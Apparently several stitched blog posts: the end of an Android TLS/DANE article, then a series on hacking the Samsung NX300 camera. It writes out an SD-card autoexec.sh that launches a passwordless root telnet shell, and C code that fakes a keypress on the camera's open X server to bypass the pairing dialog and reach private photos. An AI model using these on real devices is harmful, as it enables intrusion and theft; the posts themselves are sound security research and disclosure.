The problem with the TOFU approach is that it does not mix well with the PKI infrastructure model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).
With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.
If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course you can create your own, self-signed, certificate with a ridiculously long expiration time, but this practice is frowned upon (for self-signing and long expiration times).
Currently, some ideas exist about how to combine PKI with TOFU, but the only sensible thing that an app can do is to give a shrug and ask the user.
Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your apps' TLS connections, that leverages the system's ability for certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination as legitimate. Internally, MTM is using a key store where it collects all the certificates that the user has permanently accepted.
Browser
If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.
Outlook
DNS + TLS = DANE
Besides of TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).
With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:
- (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
- (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
- (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
- (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.
Multiple constraints can be specified to tighten the checks, encoded in TLSA
records (for TLS association). TLSA records are always specific to a given
server name and port. For example, to make a secure XMPP connection with
"zombofant.net
", first the XMPP SRV record (_xmpp-client._tcp
) needs to be
obtained:
$ host -t SRV _xmpp-client._tcp.zombofant.net
_xmpp-client._tcp.zombofant.net has SRV record 0 0 5222 xmpp.zombofant.net.
Then, the TLSA record(s) for xmpp.zombofant.net:5222
must be obtained:
$ host -t TLSA _5222._tcp.xmpp.zombofant.net
_5222._tcp.xmpp.zombofant.net has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D
This record reads as: the server is using a domain issued certificate (3) with
the full certificate (0) represented via its SHA-256 hash (1):
75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D
.
And indeed, if we check the server certificate using openssl s_client
, the
SHA-256 hash does match:
Subject: CN=zombofant.net
Issuer: O=Root CA, OU=http://www.cacert.org, CN=CA Cert Signing Authority/emailAddress=support@cacert.org
Validity
Not Before: Apr 8 07:25:35 2014 GMT
Not After : Oct 5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D
Of course, this information can only be relied upon if the DNS records are
secured by
DNSSEC.
And DNSSEC can be abused by the same entities that already can manipulate Root
CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of
attack is made significantly harder: while a typical Root CA list contains
hundreds of entries, with an unknown number of intermediate CAs each, and it
is sufficient to compromise any one of them to screw you, with DNSSEC, the
attacker needs to obtain the keys to your domain (zombofant.net
), to your
top-level domain (.net
) or the master root keys (.
). In addition to that
improvement, another benefit of DANE is that server operators can replace
(paid) Root CA services with (cheaper/free) DNS records.
However, there is a long way until DANE can be used in Java. Java's own DNS code is very limited (no SRV support, TLSA - what are you dreaming of?) The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.
Conclusion
Internet security is hard. Let's go bake some cookies!
Comments on HN
This is the second post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. In this post, we will have a deeper look at the operating system running on the camera, execute some code and open a remote root shell. This process can be applied (with some adaptations) to different networked consumer electronics, including home routers, NAS boxes and Smart TVs. The third post will leveage that knowledge to add functionality.
Firmware: Looking for Loopholes
Experience shows that most firmware images provide an easy way to run a user-provided shell script on boot. This feature is often added by the "software engineers" during development, but it boils down to a local root backdoor. On a camera, the SD card would be a good place to search. Other devices might execute code from an USB flash drive or the built-in hard disk.
Usually, we have to start with the firmware update file (nx300.bin
from
this 241MB ZIP
in our case), run binwalk on it, extract and mount the
root file system and have our fun. In this case, however, the source archive
from Samsung's OSS Release Center contains
an unpacked root file system tree in TIZEN/project/NX300/image/rootfs
, so we
just examine that:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l
total 72
drwxr-xr-x 4 4096 Oct 16 2013 bin/
drwxr-xr-x 3 4096 Oct 16 2013 data/
drwxr-xr-x 3 4096 Oct 16 2013 dev/
drwxr-xr-x 38 4096 Oct 16 2013 etc/
drwxr-xr-x 9 4096 Oct 16 2013 lib/
-rw-r--r-- 1 203 Oct 16 2013 make_image.log
drwxr-xr-x 8 4096 Oct 16 2013 mnt/
drwxr-xr-x 3 4096 Oct 16 2013 network/
drwxr-xr-x 16 4096 Oct 16 2013 opt/
drwxr-xr-x 2 4096 Oct 16 2013 proc/
lrwxrwxrwx 1 13 Oct 16 2013 root -> opt/home/root/
drwxr-xr-x 2 4096 Oct 16 2013 sbin/
lrwxrwxrwx 1 8 Oct 16 2013 sdcard -> /mnt/mmc
drwxr-xr-x 2 4096 Oct 16 2013 srv/
drwxr-xr-x 2 4096 Oct 16 2013 sys/
drwxr-xr-x 2 4096 Oct 16 2013 tmp/
drwxr-xr-x 16 4096 Oct 16 2013 usr/
drwxr-xr-x 13 4096 Oct 16 2013 var/
make_image.log
sounds like somebody forgot to clean up before shipping (this
file is actually contained on the camera):
SBS logging begin
Wed Oct 16 14:27:21 KST 2013
WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+rx; use --squash-rino-perm or --nosquash-rino-perm to suppress this warning
If we can believe the /sdcard
symlink, the SD card is mounted at /mnt/mmc
.
Usually, there are some scripts and tools referencing the directory, and we
should start with them:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .
./etc/fstab:/dev/mmcblk0 /mnt/mmc exfat noauto,user,umask=1000 0 0
./etc/fstab:/dev/mmcblk0p1 /mnt/mmc exfat noauto,user,umask=1000 0 0
./usr/sbin/pivot_rootfs_ubi.sh:umount /oldroot/mnt/mmc
./usr/sbin/rcS.pivot: mkdir -p /mnt/mmc
./usr/sbin/rcS.pivot: mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc
./usr/bin/inspkg.sh: mount -t vfat /dev/mmcblk0 /mnt/mmc
./usr/bin/inspkg.sh: mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/inspkg.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/inspkg.sh:find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
./usr/bin/ubi_initial.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ubi_initial.sh:cd /mnt/mmc
./usr/bin/remount_mmc.sh: nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage
./usr/bin/remount_mmc.sh: umount /mnt/mmc 2> /dev/null
./usr/bin/remount_mmc.sh: /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
./usr/bin/remount_mmc.sh: /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]
What we have here are some usual Linux boot-up configuration files (fstab
,
rcS.pivot
, ubi_initial.sh
), a very interesting script that installs any
Debian packages from the SD card (inspkg.sh
), and ~50 shared libraries and
executable binaries with the /mnt/mmc
string hardcoded inside.
Package Installer Script
Let us have a look at inspkg.sh
first:
#! /bin/sh
echo $1
if [ "$#" = "2" ]
then
if [ "$2" = "0" ]
then
echo -e "mount mmcblk0.."
mount -t vfat /dev/mmcblk0 /mnt/mmc
else
echo -e "mount mmcblk0p1..."
mount -t vfat /dev/mmcblk0p1 /mnt/mmc
fi
else
echo -e "mount mmcblk0p1..."
mount -t vfat /dev/mmcblk0p1 /mnt/mmc
fi
find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
echo -e "sync...."
sync
This is a shell script that takes one or two arguments. The first one is the
package name to look for (the find
command will find and install all .deb
files containing the first argument in their name). The second argument is
used to mount the correct partition of the SD card. Surely we can use this
script to install dropbear,
gcc or moon-buggy. Now we only need to figure out how (or from where) this
script is run:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r inspkg.sh .
georg@megavolt:TIZEN/project/NX300/image/rootfs$
Whoops. There are no references to it in the firmware. It was merely a red herring, and we need to find another way in.
The Magic Binary Blob
In /usr/bin
, the most interesting file is di-camera-app-nx300
, making
references to /mnt/mmc/Demo/NX300_Demo.mp4
, /mnt/mmc/SYSTEM/Device.xml
and
a bunch of WAV files in /mnt/mmc/sounds/
that seem to correspond to UI
actions (up
, down
, ..., delete
, ev
, wifi
).
This is obviously the magic binary blob controlling the really interesting functions (like the UI, the shutter, and the image processor). Most consumer electronics branded as "Open Source" contain some kind of Linux runtime which is only used to execute one large binary. That binary in turn encloses all the things you want to tinker with, but it is not provided with source code, still leaving you at the mercy of the manufacturer.
As expected, this program comes out of nowhere. There are traces of the
di-camera-app-nx300
Debian package (version 0.2.387) being installed:
Package: di-camera-app-nx300
Status: install ok installed
Priority: extra
Section: misc
Installed-Size: 87188
Maintainer: Sookyoung Maeng <[snip]@samsung.com>, Jeounggon Yoo <[snip]@samsung.com>
Architecture: armel
Source: di-camera-app
Version: 0.2.387
Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (>= 2.4),
libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,
libecore-x, libedje (>= 0.9.9.060+svn20100304), libeina (>= 1.0.0.001+svn20100831),
libelm, libevas (>= 0.9.9.060+svn20100203), libgcc1 (>= 1:4.4.0),
libglib2.0-0 (>= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,
libmm-utility, libnetwork-0, libnl2 (>= 2.0), libslp-pm-0, libslp-utilx-0,
libstdc++6 (>= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,
libxrandr2 (>= 2:1.2.0), libxtst6, prefman, libproduction-mode,
libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,
libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,
sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,
di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,
diosal
Description: Digital Imaging inhouse application for nx300
So this package is created from di-camera-app
, which does not exist either,
except "inhouse". Thank you Samsung for spoiling the fun... :-(
Besides of some start/stop scripts, the only other interesting reference to
this magic binary blob is in TIZEN/build/exec.sh
, which looks like a mixture
of installation and startup script:
#!/bin/sh
#
cp -f *.so /usr/lib
cp -f di-camera-app-nx300 /usr/bin
sync
sync
sync
sleep 1
cd /
startx; di-camera-app &
(Because with only one sync
, you can never know, and two might still not be
enough if you must be 300% sure the data has been written).
The camera app is accompanied by another magic binary blob for WiFi,
smart-wifi-app-nx300
(Samsung should get an award for creative file names).
However, there are no hints at possible code execution in either program, so
we need to dig even deeper.
Searching Shared Libraries
The situation in /usr/lib
is different, though. We can run strings
on the
files that mention the SD card mount point (limiting the output to the
relevant lines):
georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do \
echo "--- $f" ; strings $f | grep /mnt/mmc; done
[snip]
--- libmisc.so
/mnt/mmc
/mnt/mmc/autoexec.sh
--- libnetwork.so
/mnt/mmc/iperf.txt
--- libstorage.so
/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e > /tmp/card_result.txt
cp /tmp/card_result.txt /mnt/mmc
/mnt/mmc/auto_run.sh
Okay, this is starting to get hot! /mnt/mmc/autoexec.sh
and
/mnt/mmc/auto_run.sh
are exactly what we have been looking for. We need to
try one of them and see what happens!
autoexec.sh
To test our theory, we need to mount the camera via USB, and create the
following autoexec.sh
file in its root directory (Windows users watch out,
the file needs to have Unix linebreaks!):
#!/bin/sh
LOG=/mnt/mmc/autoexec.log
date >> $LOG
id >> $LOG
echo "$PATH" >> $LOG
ps axfu >> $LOG
mount >> $LOG
Now we need to unmount the camera,
turn it off and on again, wait
some seconds, mount it, and check if we got lucky. Let's see... autoexec.log
is there! Jackpot! Now we can analyze its contents, piece by piece:
Fri May 9 06:25:20 UTC 2014
uid=0(root) gid=0(root)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:/sbin:/usr/local/bin:/usr/scripts
This output was just generated, it was running as root (yeah!), and the path looks rather boring.
PID VSZ RSS STAT COMMAND
[stripped boring kernel threads and some columns]
1 2988 52 Ss init
139 11460 1348 S /usr/bin/system_server
144 2652 188 Ss dbus-daemon --system
181 3416 772 Ss /usr/bin/power_manager
232 12268 4608 S<s+ /usr/bin/Xorg :0 -logfile /opt/var/log/Xorg.0.log -ac -noreset \
-r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d
243 2988 76 Ss init
244 2988 56 Ss init
245 2988 60 Ss+ init
246 2988 56 Ss+ init
247 2988 8 S sh /usr/etc/X11/xinitrc
256 20200 2336 S \_ /usr/bin/enlightenment -profile samsung \
-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
254 19876 8 S /usr/bin/launchpad_preloading_preinitializing_daemon
255 12648 816 S /usr/bin/ac_daemon
259 3600 8 S dbus-launch --exit-with-session /usr/bin/enlightenment -profile samsung \
-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
260 2652 8 Ss /usr/bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
267 690688 34760 Ssl di-camera-app-nx300
404 2988 520 S \_ sh -c /mnt/mmc/autoexec.sh
405 2988 552 S \_ /bin/sh /mnt/mmc/autoexec.sh
408 2860 996 R \_ ps axfu
Our script is executed by di-camera-app-nx300
, there is enlightenment and
dbus running, and
i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it.
The mount point list looks pretty standard as well for an embedded device, using UBIFS for flash memory and the exfat driver for the SD card:
rootfs on / type rootfs (rw)
ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)
devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)
none on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,relatime)
tmpfs on /var/lock type tmpfs (rw,relatime)
tmpfs on /var/tmp type tmpfs (rw,relatime)
tmpfs on /var/backups type tmpfs (rw,relatime)
tmpfs on /var/cache type tmpfs (rw,relatime)
tmpfs on /var/local type tmpfs (rw,relatime)
tmpfs on /var/log type tmpfs (rw,relatime)
tmpfs on /var/mail type tmpfs (rw,relatime)
tmpfs on /var/opt type tmpfs (rw,relatime)
tmpfs on /var/spool type tmpfs (rw,relatime)
tmpfs on /opt/var/log type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,
dmask=0022,allow_utime=0020,codepage=cp437,iocharset=iso8859-1,namecase=0,errors=remount-ro)
Remote Access
The camera is not connected to your WiFi network by default, you have to
launch one of the WiFi apps first. The most reliable one for experimenting in
your (protected) home network is the Email app. After you launch it, the
camera looks for WiFi networks (configure your own one here), and stays
connected for a long time, keeping the X server (and anything you run via
autoexec.sh
) open.
After tinkering around with a static dropbear
binary downloaded from the
Internets (and binary-patching the references to dropbear_rsa_host_key
and
authorized_keys
), I ran into a really silly problem:
[443] May 09 12:00:45 user 'root' has blank password, rejected
Running a Telnet Server
Around the same time, I realized one thing that I should have checked first:
lrwxrwxrwx 1 17 May 22 2013 /usr/sbin/telnetd -> ../../bin/busybox
Our firmware comes with busybox, and busybox comes with telnetd
- an easy to
deploy remote login service. After
the realization settled, the
first attempt looked like we almost did it:
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
Connection closed by foreign host.
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
telnet: Unable to connect to remote host: Connection refused
Wow, the telnet port was open, something was running, but we crashed it! Another two mount-edit-restart-mount cycles later, the issue was clear:
telnetd: can't find free pty
Fortunately, the solution is documented. Now we can log into the camera for sure?
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
************************************************************
* SAMSUNG LINUX PLATFORM *
************************************************************
nx300 login: root
Login incorrect
Damn, Samsung! Why no login? Maybe we can circumvent this in some way? Does the busybox telnetd help provide any hints?
-l LOGIN Exec LOGIN on connect
Maybe we can replace the evil password-demanding login
command with... a
shell? Let us adapt our SD card autoexec.sh
script to what we have
gathered:
#!/bin/sh
mkdir -p /dev/pts
mount -t devpts none /dev/pts
telnetd -l /bin/bash -F > /mnt/mmc/telnetd.log 2>&1 &
Another mount-edit-restart cycle, and we are in:
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
************************************************************
* SAMSUNG LINUX PLATFORM *
************************************************************
nx300:/# cat /proc/cpuinfo
Processor : ARMv7 Processor rev 8 (v7l)
BogoMIPS : 1395.91
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x2
CPU part : 0xc09
CPU revision : 8
Hardware : Samsung-DRIMeIV-NX300
Revision : 0000
Serial : 0000000000000000
nx300:/# free
total used free shared buffers cached
Mem: 512092 500600 11492 0 132 41700
-/+ buffers/cache: 458768 53324
Swap: 30716 8084 22632
nx300:/# df -h /
Filesystem Size Used Available Use% Mounted on
ubi0!rootdir 352.5M 290.8M 61.6M 83% /
nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/
total 1584
drwxr-xr-x 2 root root 520 May 22 2013 .
drwxr-xr-x 3 root root 232 May 22 2013 ..
-rwxr-xr-x 1 root root 394775 May 22 2013 SAM_0015.JPG
-rwxr-xr-x 1 root root 335668 May 22 2013 SAM_0016.JPG [Obama was here]
-rwxr-xr-x 1 root root 357591 May 22 2013 SAM_0017.JPG
-rwxr-xr-x 1 root root 291493 May 22 2013 SAM_0018.JPG
-rwxr-xr-x 1 root root 232470 May 22 2013 SAM_0019.JPG
nx300:/#
Congratulations, you have gained network access to yet another Linux appliance! From here, you should be able to perform anything you want on the camera, except from the interesting things closed in the Samsung binaries.
Full series:
The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.
Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.
This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.
The findings in this blog posts are based on firmware version 1.31.
NFC Tag
The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with an URL.
The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.
WiFi Networking
You can configure the NX300 to enter your WiFi network, it will behave like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6000/tcp open X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
This scan was performed while the "E-Mail" application was open. In AllShare
Play and MobileLink modes, 7676/tcp
is opened in addition. Further, in
Remote Viewfinder mode, the camera also opens 7679/tcp
.
X Server
Wait, what? X11 as an open service? Could that be true? For sure it is access-locked via TCP to prevent abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
480x800 60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:
X11 Key Bindings
A short investigation using xev
outlines that the physical keys on the
camera body are bound to X11 key events as follows:
On/Off | XF86PowerOff (only when turning off) |
---|---|
Scroll Wheel | XF86ScrollUp / XF86ScrollDown |
Direct Link | XF86Mail |
Mode Wheel | F1 .. F10 |
Video Rec | XF86WebCam |
+/- | XF86Reload |
Menu | Menu |
Fn | XF86HomePage |
Keypad | KP_Left .. KP_Down, KP_Enter |
Play | XF86Tools |
Delete | KP_Delete |
WiFi Client: Firmware Update Check
When the camera goes online, it performs a firmware version check.
First, it retrieves http://gld.samsungosp.com
:
Request:
GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
200 OK
This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...
Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but has your location data (apparently obtained from the IP) in the headers:
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
Wow! They know where I live! At least they do not transmit any unique identifiers with the query.
As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.
Known versions so far:
WiFi Access Point: UPnP/DLNA
Two of the on-camera apps (MobileLink, Remote Viewfinder) open an
unencrypted access point named AP_SSC_NX300_0-XX:XX:XX
(where XX:XX:XX
is the device part of its MAC address). Fortunately, Samsung's engineers were
smart and added a user confirmation dialog to the camera UI, to prevent remote
abuse:
Unfortunately, this dialog is running on a wide-open X server, so all we need
is to fake an KP_Return
event (based on an
example by bharathisubramanian),
and we can connect with whichever client, stream a live video or download all
the private pictures from the SD card, depending on the enabled mode:
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <unistd.h>
/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
if (keycode == 0) return;
XTestGrabControl (disp, True);
/* Generate modkey press */
if (modsym != 0) {
modcode = XKeysymToKeycode(disp, modsym);
XTestFakeKeyEvent (disp, modcode, True, 0);
}
/* Generate regular key press and release */
XTestFakeKeyEvent (disp, keycode, True, 0);
XTestFakeKeyEvent (disp, keycode, False, 0);
/* Generate modkey release */
if (modsym != 0)
XTestFakeKeyEvent (disp, modcode, False, 0);
XSync (disp, False);
XTestGrabControl (disp, False);
}
/* Main Function */
int main (){
Display *disp = XOpenDisplay (NULL);
sleep (1);
/* Send Return */
SendKey (disp, XK_Return, 0);
}
DLNA Service: Remote Viewfinder
The DLNA service is exposing some camera features, which are queried and
used by the Android app. The device's friendly name is [Camera]NX300
,
as can be queried via HTTP from http://nx300:7676/smp_2_
:
<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>[Camera]NX300</friendlyName>
<manufacturer>Samsung Electronics</manufacturer>
<manufacturerURL>http://www.samsung.com</manufacturerURL>
<modelDescription>Samsung Camera DMS</modelDescription>
<modelName>SP1</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.samsung.com</modelURL>
<serialNumber>20081113 Folderview</serialNumber>
<sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
<UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
<serviceList>
<service>
<serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
<controlURL>/smp_4_</controlURL>
<eventSubURL>/smp_5_</eventSubURL>
<SCPDURL>/smp_3_</SCPDURL>
</service>
<service>
<serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
<controlURL>/smp_7_</controlURL>
<eventSubURL>/smp_8_</eventSubURL>
<SCPDURL>/smp_6_</SCPDURL>
</service>
</serviceList>
<sec:deviceID>
</sec:deviceID>
</device>
Additional SOAP services are provided for changing settings like focus and
flash (/smp_3_
):
Function | Arguments | Result |
---|---|---|
GetSystemUpdateID | Id | |
GetSearchCapabilities | SearchCaps | |
GetSortCapabilities | SortCaps | |
Browse | ObjectID BrowseFlag
Filter StartingIndex RequestedCount SortCriteria | Result NumberReturned TotalMatches UpdateID |
GetIP | GETIPRESULT | |
GetInfomation | GETINFORMATIONRESULT StreamUrl | |
SetResolution | RESOLUTION | |
ZoomIN | CURRENTZOOM | |
ZoomOUT | CURRENTZOOM | |
MULTIAF | AFSTATUS | |
AF | AFSTATUS | |
setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
touchAF | AFPOSITION | TOUCHAF_RESULT |
AFRELEASE | AFRELEASERESULT | |
ReleaseSelfTimer | RELEASETIMER | |
Shot | AFSHOTRESULT | |
ShotWithGPS | GPSINFO | AFSHOTRESULT |
SetLED | LEDTIME | |
SetFlash | FLASHMODE | |
SetStreamQuality | Quality |
Another service is available for picture / video streaming (/smp_4_
):
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT>
<Resolutions>
<Resolution><Width>5472</Width><Height>3648</Height></Resolution>
<Resolution><Width>1920</Width><Height>1080</Height></Resolution>
</Resolutions>
<Flash>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<Defaultflash>auto</Defaultflash>
</Flash>
<FlashDisplay>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<CurrentFlashDisplay>off</CurrentFlashDisplay>
</FlashDisplay>
<ZoomInfo>
<DefaultZoom>0</DefaultZoom>
<MaxZoom>1</MaxZoom>
</ZoomInfo>
<AVAILSHOTS>289</AVAILSHOTS>
<ROTATION>1</ROTATION>
<StreamQuality>
<Quality><Option>high</Option><Option>low</Option></Quality>
<Default>high</Default>
</StreamQuality>
</GETINFORMATIONRESULT>
<StreamUrl>
<QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
</StreamUrl>
</u:GetInfomationResponse>
</s:Body>
</s:Envelope>
After triggering the right commands, a live video stream should be available
